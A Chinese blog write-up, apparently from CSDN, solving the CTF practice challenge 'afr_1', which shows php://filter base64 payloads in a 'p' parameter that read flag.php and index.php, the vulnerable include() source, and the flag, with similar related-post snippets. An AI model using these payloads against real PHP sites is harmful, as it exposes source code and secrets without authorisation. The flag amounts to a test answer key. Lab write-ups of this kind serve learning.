[第一章 web入门]afr_1 解题思路

已于 2023-10-10 09:06:25 修改
阅读量168 收藏
点赞数
文章标签: 安全
于 2023-10-10 09:04:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiyuanyue/article/details/133735925
版权

知识点:

php伪协议官网PHP: 支持的协议和封装协议 - Manual

<?php
/* 这会以大写字母输出 www.example.com 的全部内容 */
readfile("php://filter/read=string.toupper/resource=http://www.example.com");

/* 这会和以上所做的一样,但还会用 ROT13 加密。 */
readfile("php://filter/read=string.toupper|string.rot13/resource=http://www.example.com");
?>

1、通过dirsearch 扫描,发现存在flag.php和index.php

2、通过伪协议读取内容

?p=php://filter/read=convert.base64-encode/resource=flag

?p=php://filter/read=convert.base64-encode/resource=index

flag.php 内容

<?php
die('no no no');
//n1book{afr_1_solved}

index.php 文件内容自动跳转到/?p=hello

<?php

if(isset($_GET['p'])) {
    include (string)$_GET['p'] . ".php";
}
else{
    header('Location: /?p=hello');
}

xiyuanyue
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
[第一章 web入门]afr_1
qq_43618536的博客
07-24 820
[第一章 web入门]afr_1
第一章 web入门]afr_1 1】任意文件读取
最新发布
carrot11223的博客
01-25 745
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
BUUCTF[第一章 web入门]afr_1
hivjianxian的博客
11-22 528
ctf题解
N1Book-第一章Web入门-任意文件读取漏洞-afr_1
抒情诗
05-08 347
这个是传统的任意文件读取漏洞,可以利用php的本地文件包含(Local File Include)实现,使用php的伪协议进行文件读取;或者利用php文件读取函数。本题为Nu1L团队编著的《从0到1:CTFer成长之路》配套题目。来源网站:https://book.nu1l.com/这里可能没有include文件包含,而是使用。没源码不好分析,这里应该逻辑也不大难。造成的文件读取漏洞。
AFR.zip_RP Java_afr 48a_cad java_java cad_them
09-19
A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...
C#人脸识别+虹软AFR_FSDK_Demo_仅供项目实战学习
07-10
使用到的虹软的SDK包中,提供了人脸识别的库,它的名字叫face_recongnition.dll,我们找到它的SDK文档。 来建立各个结构体和API的C#映射...这个结构体是FD识别的输出结构体,我们在上一章节标记人脸时使用了此结构体。
HA_AFR20_gnatix
03-04
快速查找工具HA_AFR20_gnatix
AFR1:改写AFR
03-19
"AFR1:改写AFR"这个标题可能指的是一个特定的VBA项目或模块,其目标是对"AFR"(可能是“非洲”、“空气燃料比”或其他特定术语的缩写)进行重新设计或优化。描述中提到的同样内容,进一步确认了这是一个关于AFR的VBA...
士研电机液面控制器AFR-1说明书.pdf
09-11
士研电机液面控制器AFR-1说明书pdf,士研电机液面控制器AFR-1说明书:适用于控制任何导电液体之液面,用于交流电,具有突波保护装置,可有效的防止突波干扰,电极头使用低交流电压,可增加寿命,有两只指示灯,指示供水...
BUUCTF [第一章 web入门]afr_1
woshicainiao666的博客
08-21 263
题目告诉我们是任意文件读取,看到?p=hello 我们将hello换成flag,得到下图。我们想到利用php伪协议看源代码有没有隐藏信息。将源代码以base64的形式输出。然后解码得到flag。
BUUCTF N1BOOK [第一章 web入门]
Sk1y的博客
03-26 3597
sql盲注脚本 目录穿越 session伪造 源码泄露
buuct—[第一章 web入门]afr_1
weixin_52620919的博客
10-18 1030
以上是题目 找大佬文章拜读一下 说是利用php伪协议的 不太理解 原理 PHP向用户提供的指定待打开文件的方式,是一个文件流 PHP的Filter机制,可对目前的协议进行一定的处理,比如将当前文件流的内容进行Base64编码。 使用方法php://filter/read=convert.base64-encode/resource=xxx 利用Filter机制,构造形如以上的攻击数据可以读取文件,拿到各种文件的源码 构造解题payload php://filter 读取源代码并进行base64编码输出,.
《从0到1:CTFer成长之路》afr_1
ZhShy
01-12 2011
文章目录靶场:afr_1知识点解题过程Flag:n1book{afr_1_solved} 靶场:afr_1 知识点 PHP向用户提供的指定待打开文件的方式,是一个文件流 PHP的Filter机制,可对目前的协议进行一定的处理,比如将当前文件流的内容进行Base64编码。 http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd 利用Filter机制,构造形如以上的攻击数据可以读取文件,拿到各种文件的源码
N1BOOK第四关摸鱼:[第一章 web入门]afr_1
weixin_45571987的博客
12-02 2655
BUUCTF:[第一章 web入门]afr_1寻找考点构造解题payload解码base64编码得到flag关于php伪协议 寻找考点   由题目我们可以得知本题考点是php伪协议(其实知道是文件读取漏洞也不知道会用到php://filter的伪协议来读取源码的文件 构造解题payload   php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。 下面我们构造url,下面是通用格式http://127.0.0.1/cmd.php?file=ph
《从0到1:CTFer成长之路》书籍配套题目[第一章 web入门]SQL注入
wuyaowangchuan的博客
11-19 2020
这道题没有过滤,超级简单 文章目录手注sqlmap跑 进入环境 手注 b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1' http://b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1%27%20and%201=1%20%23 id=1%27%20and%201=2%20%23 说明是字符型注入 然后开始注入 ?id=1%27.
【N1BOOK】[第一章 web入门] wp
{OvEr}的博客
11-25 4153
【N1BOOK】[第一章 web入门]常见的搜集 wp 打开页面就是这样的 我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp 扫目录工具dirsearch/御剑,这里我用的是dirsearch。 我们一个个访问一下, 他说flag在/flag1_is_her3_fun.txt,那我们就访问一下 得到第一半flag,继续访问 index.php~ 得到第2半flag,继续访问 .index.php.swp,打开文件 发现第3半flag ..
《从0到1:CTFer成长之路》--afr_1 BUUCTF
wuyaowangchuan的博客
11-17 4014
任意文件读取漏洞 发现了?p=hello,然后页面回显了hello world 因为提示了是文件读取漏洞 没有回显 因为刚刚也是?p=hello没有后缀,猜测后台有自己加后缀 php的filter读取一下 ?p=php://filter/read=convert.base64-encode/resource=flag PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 base64解码 n1book{afr_1_solv.
afr_1
weixin_45711265的博客
01-09 391
buuctf N1book ok,让我们继续看看 buuctf N1book afr_1 任意文件读取 打开靶机,发现url上有提示"p="为任意文件读取,利用php伪协议php://filter/read=convert.base64-encode/resource=index.php ?p=php://filter/read=convert.base64-encode/resource=flag(此时无后缀,因为原题p=hello无后缀,猜测后台添加后缀) 得到PD9waHAKZGllKCdubyBu
AFR_FSDK_FACEMODEL
11-10
AFR_FSDK_FACEMODEL是虹软人脸识别SDK中的一个结构体,用于存储人脸特征数据。该结构体包含两个成员变量:pbFeatur和FeaturSiz。其中,pbFeatur是一个指向人脸特征数据的指针,FeaturSiz是人脸特征数据的长度。通过...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiyuanyue

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值